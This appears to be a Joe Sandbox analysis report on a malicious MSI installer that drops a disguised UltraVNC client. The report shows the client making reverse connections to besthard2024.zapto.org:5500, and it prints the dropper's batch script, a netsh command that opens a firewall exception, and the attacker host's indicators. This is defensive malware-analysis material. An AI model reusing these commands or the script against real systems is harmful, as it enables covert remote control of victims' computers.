                  Source: C:\Windows\Installer\MSI4384.tmpCode function: GetLocaleInfoW,3_2_00464FDB
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: GetLocaleInfoEx,3_2_00448F9C
                  Source: C:\Games\PrintDrivers.exeCode function: GetLocaleInfoW,4_2_005BF04D
                  Source: C:\Games\PrintDrivers.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_005BF173
                  Source: C:\Games\PrintDrivers.exeCode function: GetLocaleInfoW,4_2_005BF279
                  Source: C:\Games\PrintDrivers.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_005BF348
                  Source: C:\Games\PrintDrivers.exeCode function: GetLocaleInfoEx,___wcsnicmp_ascii,4_2_005A433F
                  Source: C:\Games\PrintDrivers.exeCode function: GetLocaleInfoW,4_2_005B83B3
                  Source: C:\Games\PrintDrivers.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,4_2_005A440A
                  Source: C:\Games\PrintDrivers.exeCode function: EnumSystemLocalesW,4_2_005BECD4
                  Source: C:\Games\PrintDrivers.exeCode function: EnumSystemLocalesW,4_2_005BEC89
                  Source: C:\Games\PrintDrivers.exeCode function: EnumSystemLocalesW,4_2_005BED6F
                  Source: C:\Games\PrintDrivers.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_005BEDFA
                  Source: C:\Games\PrintDrivers.exeCode function: EnumSystemLocalesW,4_2_005B7E3A
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Games\PrintDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Games\PrintDriver.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0044A445 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_0044A445
                  Source: C:\Windows\Installer\MSI4384.tmpCode function: 3_2_0045F7A4 GetTimeZoneInformation,3_2_0045F7A4

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Modifies the windows firewall
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
                  Uses netsh to modify the Windows network and firewall settings
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL

                  Stealing of Sensitive Information

                  barindex
                  Yara detected UltraVNC Hacktool
                  Source: Yara matchFile source: 26.2.PrintDriver.exe.7ff67da80000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.0.PrintDriver.exe.7ff67da80000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001A.00000000.1861273877.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000000.1861087410.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.2961946553.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PrintDriver.exe PID: 7304, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Games\PrintDriver.exe, type: DROPPED

                  Remote Access Functionality

                  barindex
                  Yara detected UltraVNC Hacktool
                  Source: Yara matchFile source: 26.2.PrintDriver.exe.7ff67da80000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 26.0.PrintDriver.exe.7ff67da80000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001A.00000000.1861273877.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000000.1861087410.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001A.00000002.2961946553.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: PrintDriver.exe PID: 7304, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Games\PrintDriver.exe, type: DROPPED
                  Contains VNC / remote desktop functionality (version string found)
                  Source: PrintDriver.exe, 0000001A.00000002.2957849457.000000D5AECFC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                  Source: PrintDriver.exe, 0000001A.00000002.2958719797.0000021794F53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Replication Through Removable Media                  		1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		22
                  Disable or Modify Tools                  		OS Credential Dumping2
                  System Time Discovery                  		1
                  Remote Desktop Protocol                  		1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory11
                  Peripheral Device Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		1
                  Bootkit                  		12
                  Process Injection                  		2
                  Obfuscated Files or Information                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Registry Run Keys / Startup Folder                  		1
                  DLL Side-Loading                  		NTDS34
                  System Information Discovery                  		Distributed Component Object ModelInput Capture1
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  File Deletion                  		LSA Secrets121
                  Security Software Discovery                  		SSHKeylogging1
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                  Masquerading                  		Cached Domain Credentials1
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Modify Registry                  		DCSync3
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Virtualization/Sandbox Evasion                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Bootkit                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531399 Sample: rs8dpaIe6D.msi Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 68 besthard2024.zapto.org 2->68 76 Multi AV Scanner detection for domain / URL 2->76 78 Multi AV Scanner detection for submitted file 2->78 80 Yara detected UltraVNC Hacktool 2->80 82 AI detected suspicious sample 2->82 11 PrintDrivers.exe 1 2->11         started        13 msiexec.exe 36 56 2->13         started        17 msiexec.exe 2 2->17         started        signatures3 process4 file5 19 cmd.exe 3 11->19         started        60 C:\Windows\Installer\MSI4384.tmp, PE32 13->60 dropped 62 C:behaviorgraphames\PrintDriver.exe, PE32+ 13->62 dropped 64 C:\Windows\Installer\MSI4075.tmp, PE32 13->64 dropped 66 8 other files (none is malicious) 13->66 dropped 94 Creates an undocumented autostart registry key 13->94 96 Drops executables to the windows directory (C:\Windows) and starts them 13->96 22 msiexec.exe 13->22         started        24 MSI4384.tmp 13->24         started        signatures6 process7 signatures8 84 Uses cmd line tools excessively to alter registry or file data 19->84 86 Uses netsh to modify the Windows network and firewall settings 19->86 88 Modifies the windows firewall 19->88 26 cmd.exe 1 19->26         started        28 PrintDrivers.exe 19->28         started        30 cmd.exe 1 19->30         started        33 12 other processes 19->33 process9 signatures10 35 PrintDriver.exe 26->35         started        39 WMIC.exe 1 26->39         started        41 netsh.exe 1 2 26->41         started        47 3 other processes 26->47 43 cmd.exe 28->43         started        98 Uses cmd line tools excessively to alter registry or file data 30->98 45 reg.exe 1 30->45         started        process11 dnsIp12 70 besthard2024.zapto.org 94.156.104.60, 49743, 5500 SARNICA-ASBG Bulgaria 35->70 72 127.0.0.1 unknown unknown 35->72 90 Multi AV Scanner detection for dropped file 35->90 92 Contains VNC / remote desktop functionality (version string found) 35->92 49 cmd.exe 43->49         started        52 conhost.exe 43->52         started        54 mode.com 43->54         started        56 7 other processes 43->56 signatures13 process14 signatures15 74 Uses cmd line tools excessively to alter registry or file data 49->74 58 reg.exe 49->58         started        process16

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  rs8dpaIe6D.msi14%VirustotalBrowse
                  rs8dpaIe6D.msi26%ReversingLabsWin32.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Games\PrintDriver.exe5%ReversingLabs
                  C:\Games\PrintDriver.exe8%VirustotalBrowse
                  C:\Games\PrintDrivers.exe0%ReversingLabs
                  C:\Games\PrintDrivers.exe0%VirustotalBrowse
                  C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll0%ReversingLabs
                  C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll0%VirustotalBrowse
                  C:\Games\ddengine.dll0%ReversingLabs
                  C:\Games\ddengine.dll0%VirustotalBrowse
                  C:\Games\vnchooks.dll0%ReversingLabs
                  C:\Games\vnchooks.dll0%VirustotalBrowse
                  C:\Windows\Installer\MSI3ECB.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI3ECB.tmp0%VirustotalBrowse
                  C:\Windows\Installer\MSI3F39.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI3F39.tmp0%VirustotalBrowse
                  C:\Windows\Installer\MSI3F98.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI3F98.tmp0%VirustotalBrowse
                  C:\Windows\Installer\MSI3FE7.tmp0%VirustotalBrowse
                  C:\Windows\Installer\MSI3FE7.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI4075.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI4075.tmp0%VirustotalBrowse
                  C:\Windows\Installer\MSI4384.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI4384.tmp0%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  besthard2024.zapto.org8%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                  https://sectigo.com/CPS00%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                  http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                  http://ocsp.thawte.com00%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                  https://forum.uvnc.com0%VirustotalBrowse
                  http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=10%VirustotalBrowse
                  https://www.thawte.com/cps0/0%VirustotalBrowse
                  https://www.advancedinstaller.com1%VirustotalBrowse
                  https://www.thawte.com/repository0W0%VirustotalBrowse
                  https://www.uvnc.com0%VirustotalBrowse
                  http://java.sun.com/products/plugin/index.html#download0%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  besthard2024.zapto.org
                  		94.156.104.60
                  		truefalseunknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC0C000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drfalseunknown
                  https://sectigo.com/CPS0ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://forum.uvnc.comPrintDriver.exe.1.drfalseunknown
                  https://www.uvnc.comcmdPrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drfalse
                    		unknown
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://crl.thawte.com/ThawteTimestampingCA.crl0UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.sectigo.com0ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.thawte.com/cps0/PrintDrivers.exe.1.dr, powercfg.msi.1.drfalseunknown
                    https://forum.uvnc.comvncMenu::WndProcPrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drfalse
                      		unknown
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.thawte.com/repository0WPrintDrivers.exe.1.dr, powercfg.msi.1.drfalseunknown
                      http://ocsp.thawte.com0UVncVirtualDisplay.dll.1.dr, uvncvirtualdisplay.cat.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.advancedinstaller.comPrintDrivers.exe.1.dr, powercfg.msi.1.drfalseunknown
                      https://www.uvnc.comPrintDriver.exe.1.drfalseunknown
                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#ddengine.dll.1.dr, vnchooks.dll.1.dr, PrintDriver.exe.1.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.uvnc.comhttps://forum.uvnc.comnetPrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drfalse
                        		unknown
                        http://java.sun.com/products/plugin/index.html#downloadPrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC0C000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.drfalseunknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        94.156.104.60
                        		besthard2024.zapto.orgBulgaria
                        		48584SARNICA-ASBGfalse

                        Private

                        IP
                        127.0.0.1

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1531399
                        Start date and time:2024-10-11 08:54:09 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 7m 54s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:49
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:rs8dpaIe6D.msi
                        renamed because original name is a hash value
                        Original Sample Name:e21b2080c98beb0f04307a5a25630e23.msi
                        Detection:MAL
                        Classification:mal100.troj.evad.winMSI@78/47@1/2
                        EGA Information:
                        • Successful, ratio: 66.7%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .msi

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 93.184.221.240
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net
                        • Execution Graph export aborted for target PrintDriver.exe, PID 7304 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        02:55:05API Interceptor1x Sleep call for process: msiexec.exe modified
                        02:55:09API Interceptor2x Sleep call for process: WMIC.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        94.156.104.60Bill Details.exeGet hashmaliciousUltraVNCBrowse
                          Bill Details.exeGet hashmaliciousUltraVNCBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            besthard2024.zapto.orgBill Details.exeGet hashmaliciousUltraVNCBrowse
                            • 94.156.104.60
                            Bill Details.exeGet hashmaliciousUltraVNCBrowse
                            • 94.156.104.60
                            PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                            • 94.156.69.75
                            PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                            • 94.156.69.75

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            SARNICA-ASBGBill Details.exeGet hashmaliciousUltraVNCBrowse
                            • 94.156.104.60
                            Bill Details.exeGet hashmaliciousUltraVNCBrowse
                            • 94.156.104.60
                            2ngxhElaud.exeGet hashmaliciousXmrigBrowse
                            • 31.13.224.51
                            file.exeGet hashmaliciousXmrigBrowse
                            • 31.13.224.51
                            http://netflix.dittmedlemskap.com/Get hashmaliciousUnknownBrowse
                            • 94.156.105.136
                            SecuriteInfo.com.Trojan.DownLoader47.42925.26493.18247.exeGet hashmaliciousAmadeyBrowse
                            • 31.13.224.51
                            http://www.aliadenibasvuranli.com/Get hashmaliciousUnknownBrowse
                            • 94.156.105.78

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Games\PrintDriver.exeBill Details.exeGet hashmaliciousUltraVNCBrowse
                              Bill Details.exeGet hashmaliciousUltraVNCBrowse
                                PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                  PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                    QV3alAAmyK.msiGet hashmaliciousUnknownBrowse
                                      68uOx5fKVm.msiGet hashmaliciousUnknownBrowse
                                        LjDIDCNaEs.msiGet hashmaliciousUnknownBrowse
                                          Rechnung n. 53067.exeGet hashmaliciousUnknownBrowse
                                            document2304.msiGet hashmaliciousUnknownBrowse
                                              C:\Games\PrintDrivers.exeBill Details.exeGet hashmaliciousUltraVNCBrowse
                                                Bill Details.exeGet hashmaliciousUltraVNCBrowse
                                                  PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                    PersonalizedOffer.exeGet hashmaliciousUltraVNCBrowse
                                                      QV3alAAmyK.msiGet hashmaliciousUnknownBrowse
                                                        68uOx5fKVm.msiGet hashmaliciousUnknownBrowse
                                                          LjDIDCNaEs.msiGet hashmaliciousUnknownBrowse
                                                            Rechnung n. 53067.exeGet hashmaliciousUnknownBrowse
                                                              document2304.msiGet hashmaliciousUnknownBrowse
                                                                Ref. Num. 886789432.exeGet hashmaliciousPrivateLoaderBrowse

                                                                  Created / dropped Files

                                                                  C:\Config.Msi\603b52.rbs

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):433272
                                                                  Entropy (8bit):6.544879054722073
                                                                  Encrypted:false
                                                                  SSDEEP:12288:Hl7GrJZsRtP01Ab+biU50unhTzTQWNy7kokGqzTo:F7UJaR10A+biU50unhFNyIGqfo
                                                                  MD5:EEC86C5A0CFA1E332F79D09EC6428BEE
                                                                  SHA1:9D11AF4A93628D5D6C98621A3A51EA0F56B4F6F1
                                                                  SHA-256:C52401B50337C427CE95266FB2B633CE916E643F046CEECC557D66801B7897A9
                                                                  SHA-512:021D44EA264CACC2DDA8D4520C4E139214AE0F88D78FBC900BFCCC35FAF2D40972E5A506C0E08256DA20C7FE246E4934CAB75BC6DA3CC1407951797416FC8C3D
                                                                  Malicious:false
                                                                  Preview:...@IXOS.@.....@..KY.@.....@.....@.....@.....@.....@......&.{47512254-C195-428F-AD42-A0F24652B3FD}..Pdf..rs8dpaIe6D.msi.@.....@.....@.....@........&.{92C98B75-E1D1-429B-9815-3BF9C1AD8A52}.....@.....@.....@.....@.......@.....@.....@.......@......Pdf......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B1A2B65E-F7DC-4079-8165-372C88BB13EF}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{8438ED6F-3E17-4118-8799-F8A99D851E04}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{0BF8C5FE-822D-49A6-9F4D-84F19DDB4723}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{B93ED057-8995-473C-867B-17ED6B548B26}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{E14EB6B7-011A-4A35-BFED-B669968BC133}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{E6D432F9-EEA9-4218-B20A-1C3CD0BBE2A9}&.{47512254-C195-428F-AD42-A0F24652B3FD}.@......&.{A7AE105D-FAB1-4087-8186-7047AA58E351}&.{47512254-C195-428F-AD42-A0F24652B3FD

                                                                  C:\Games\IDD.txt

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):10
                                                                  Entropy (8bit):2.9219280948873623
                                                                  Encrypted:false
                                                                  SSDEEP:3:CnQX7:CnC7
                                                                  MD5:CC11DB32CA80446E75DB4A2CB894CC2A
                                                                  SHA1:42C3981D25ACB49A95DF67DA7925F57FDD09FD5E
                                                                  SHA-256:39FF54D94F8A0F01247276784051EFF8121AEE27D8686C80D18927109D75C506
                                                                  SHA-512:AC0D8B129A2FB37CE54A204563A74AA8CA44116F652974FF8ECFD97AA8377AC03A1898673412DE0ADCD6BA5B10441DE7584A30A65B45B1A7BD8B66C0A530012F
                                                                  Malicious:false
                                                                  Preview:5271523 ..

                                                                  C:\Games\PrintDriver.cmd

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1237
                                                                  Entropy (8bit):5.351895533121498
                                                                  Encrypted:false
                                                                  SSDEEP:24:Aep9ZV2tXY7ur3C7Thk774kIg4P5W7GykH4O/JWW41k7z2y:noo7urweiykH4OxWLUz2y
                                                                  MD5:552AAE999CE9686F113554E2F1F719E0
                                                                  SHA1:547E64C2AE0409D9065AA2A788A79BC4F5632C90
                                                                  SHA-256:B34D39A9C99A125E83C061CA2D7CCA8A987CF290657C4E8682C1DD6CF92F67FC
                                                                  SHA-512:F8B783CE28161C6B05BEEBC32DE8024BF9B5EA2F78123E1DD28ABDB15F0E518390344FA4B028519BA032452252F84A228194DFF5A15CB5DD7A3384354DFDA77C
                                                                  Malicious:false
                                                                  Preview:a::::::::::::::::::::::::::::..:: START ::..::::::::::::::::::::::::::::..Mode 90,20 & color 0A..SetLocal EnableExtensions DisableDelayedExpansion..(Set k=HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles)..For /F "Delims==" %%A In ('Set GUID[ 2^>Nul') Do Set "%%A="..Set "i=101"..For /F "Tokens=1,2*" %%A In ('Reg Query "%k%" /S /V Description') Do (.. If "%%~nB" NEQ "%%~B" (.. Call Set "GUID[%%i:*1=%%]=%%~nB".. ) Else (.. Call Call Set GUID[%%i:*1=%%]="%%%%GUID[%%i:*1=%%]%%%%","%%C".. Set/A i+=1.. )..) ..set /a numa=%random% %%999 +100..set /a numb=%random% %%999 +100..set /a numc=5%numa%%numb%....set EXEC_CMD="PrintDriver.exe"..wmic process where (name=%EXEC_CMD%) get commandline | findstr /i %EXEC_CMD%> NUL..start msedge.exe google.com.. @echo not starting %EXEC_CMD%: already running...)..echo %numc% > IDD.txt..rem start C:\Games\PrintDriver -multi -autoreconnect ID:%numc% -connect besthard2024.zapto.org:5500 -r

                                                                  C:\Games\PrintDriver.exe

                                                                  Download File
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2912200
                                                                  Entropy (8bit):6.580549444661274
                                                                  Encrypted:false
                                                                  SSDEEP:49152:B4/PAM814eSOIA+mD1Tb9qJ83xZLFUawAAUA/Ji:h/hrc83lwo
                                                                  MD5:27C1C264C6FCE4A5F44419F1783DB8E0
                                                                  SHA1:E071486E4DFEF3A13F958A252D7000D3CE7BFD89
                                                                  SHA-256:29379AFD1CA5439C82931D623FDA335174DC416E5B013591457FA1F7BBE564DB
                                                                  SHA-512:A80A512BE6F152E8737CD5D0A0A2A193EAF88F3BFB7ED6B7695D227E195DB278E2734EBFC9FE48A68CFB13E4E5BB7FB4825019CFA2210BA741ECF8B11F954A98
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Games\PrintDriver.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                  • Antivirus: Virustotal, Detection: 8%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: Bill Details.exe, Detection: malicious, Browse
